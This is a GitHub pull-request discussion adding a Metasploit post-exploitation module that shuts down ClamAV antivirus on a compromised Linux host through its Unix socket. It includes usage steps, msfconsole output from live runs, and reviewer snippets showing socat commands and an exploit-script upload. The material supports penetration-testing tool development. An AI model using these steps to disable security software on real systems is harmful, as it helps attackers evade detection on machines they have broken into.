Disable clamav via unix socket

[archcloudlabs]

This PR includes an additional metasploit module that will disable ClamAV on Linux systems.
The bug resides in the ClamAV Unix socket permitting any user to submit the "shutdown" command which will disable ClamAV.

This is bug is referenced in an open PR in the ClamAV repo here.

This module differs from clamav_control as it requires a Unix socket to interact with.

Verification

List the steps needed to make sure this thing works

### Shuting off ClamAV
  1. Launch `msfconsole`
  2. Get a Meterpreter shell on a Linux host that's also running ClamAV.
  3. Do: `use post/linux/manage/disable_clamav`
  4. Do: `set SESSION <session number on the Linux host>`
  6. Do: `exploit -j`
  7. The daemon should be shutoff.

## Scenarios

msf6 post(linux/manage/disable_clamav) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  4         meterpreter x86/linux  dllcoolj @ 192.168.130.1  127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)

msf6 post(linux/manage/disable_clamav) > show options

Module options (post/linux/manage/disable_clamav):

   Name                Current Setting        Required  Description
   ----                ---------------        --------  -----------
   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
   SESSION             4                      yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

clamav    132021       1 16 18:51 ?        00:00:09 clamd
dllcoolj  132533   71177  0 18:52 pts/3    00:00:00 sh -c ps -ef | grep 'clamd'
dllcoolj  132535  132533  0 18:52 pts/3    00:00:00 grep clamd
msf6 post(linux/manage/disable_clamav) > exploit -j
[*] Post module running as background job 10.
msf6 post(linux/manage/disable_clamav) >
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[*] Shutting down ClamAV!

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

dllcoolj  132927  132925  0 18:52 pts/3    00:00:00 grep clamd

Video

A walk through demonstrating this module can be seen here.

[adfoster-r7]

Just to confirm - does this approach work against a remote target?

i.e. won't this only shut down a Socket on the current host machine, and not the remote target?

[adfoster-r7]

For reference - here's an example of a module that uses socat that's available on the remote host to interact with the socket on the remote file system:

metasploit-framework/lib/msf/core/post/linux/f5_mcp.rb

Line 117 in db29036

incoming_data = cmd_exec("echo '#{message}' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp")

And here's an example of using python that's on the remote host to interact with the remote socket:

metasploit-framework/modules/exploits/linux/local/cve_2021_38648_omigod.rb

Lines 165 to 166 in db29036

	upload("#{path}/#{python_script}", exploit_data('CVE-2021-38648', 'cve_2021_38648.py'))
	cmd = "#{python_binary} #{path}/#{python_script} -s '#{socket_path}' '#{root_cmd}'"

It uploads the following python script:

https://github.com/rapid7/metasploit-framework/blob/db290369a4ba59744870e31e29c1d3eb4688fc97/data/exploits/CVE-2021-38648/cve_2021_38648.py

[archcloudlabs]

Just to confirm - does this approach work against a remote target?

i.e. won't this only shut down a Socket on the current host machine, and not the remote target?

Correct, this is a post module to disable clamav after a linux host has been compromised.

[adfoster-r7]

Thanks for the update!

As Metasploit won't always be running on the same host as the target, the module would have to be updated to also work remotely - like in the module examples above 👍

[archcloudlabs]

To clarify, this module is a post, module meant to be executed through a meterpreter session. The meterpreter session can be on a remote host and this should still execute without issue.

Originally I interpreted "work on remote target" as "will this work against a ip:port combo?". My bad!

[jheysel-r7]

Hey @archcloudlabs, I gave this test. With msfconsole running on one machine, and clamav running on a separate machine and I got the following error:

msf6 post(linux/manage/disable_clamav) > rexploit
[*] Reloading module...

[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[-] Post failed: Errno::ENOENT No such file or directory - connect(2) for /run/clamav/clamd.ctl
[-] Call stack:
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:64:in `connect'
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:64:in `connect_internal'
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:137:in `connect'
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:1078:in `unix'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/linux/manage/disable_clamav.rb:38:in `run'
[*] Post module execution completed

I think this is the issue that @adfoster-r7 was trying to point out. As it's written, the module only works if msfconsole is running on the same machine you're trying to exploit.

Socket.unix(datastore[CLAMAV_UNIX_SOCKET].to_s) do |sock| interacts with the filesystem that msfconsole is running on and not specifically the filesystem the meterpreter session is running on. In your case, because you're running msfconsole and on the same system as your meterpreter session and clamav, the exploit works. The examples posted above should help resolve this issue.

Please let us know if you'd like any further clarification, we're happy and hear to help!

[archcloudlabs]

Thank you for clarifying, I apologize for misunderstanding originally.
I've gone ahead and copied the F5 example and check if socat is on the target host before executing the SHUTDOWN command.
Let me know if this is sufficient!

[archcloudlabs]

Updating output below

msf6 post(linux/manage/disable_clamav) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  3         meterpreter x86/linux  vagrant @ ubuntu2004.localdomain  172.16.0.63:4444 -> 192.168.121.172:39132 (192.168.121.172)

msf6 post(linux/manage/disable_clamav) > show options

Module options (post/linux/manage/disable_clamav):

   Name                Current Setting        Required  Description
   ----                ---------------        --------  -----------
   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
   COMMAND             SHUTDOWN               yes       ClamAV command to execute
   SESSION             3                      yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(linux/manage/disable_clamav) > exploit

[+] socat exists
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[+] Sending SHUTDOWN...
[*] Post module execution completed
msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clam'
[*] exec: ps -ef | grep 'clam'

dllcoolj   43931    6670  0 21:54 pts/2    00:00:00 sh -c ps -ef | grep 'clam'
dllcoolj   43933   43931  0 21:54 pts/2    00:00:00 grep clam

[jheysel-r7]

Release Notes

This PR includes post module that will disable ClamAV on Linux systems.

[archcloudlabs]

Thanks for all the pointers!

[jheysel-r7]

Thanks for all the pointers!

Anytime! Thanks for the contribution 🙇